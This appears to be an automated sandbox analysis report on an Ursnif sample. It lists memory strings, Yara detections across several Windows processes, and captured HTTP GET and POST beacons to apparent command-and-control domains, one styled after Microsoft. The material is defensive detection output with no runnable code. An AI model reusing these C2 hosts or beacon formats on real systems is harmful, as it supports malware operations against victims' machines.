Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown DNS traffic detected: queries for: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Oct 2021 23:34:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.youtube.com (Youtube)
Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Find us: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Follow us: www.twitter.com/g5games equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Watch us: www.youtube.com/g5enter equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
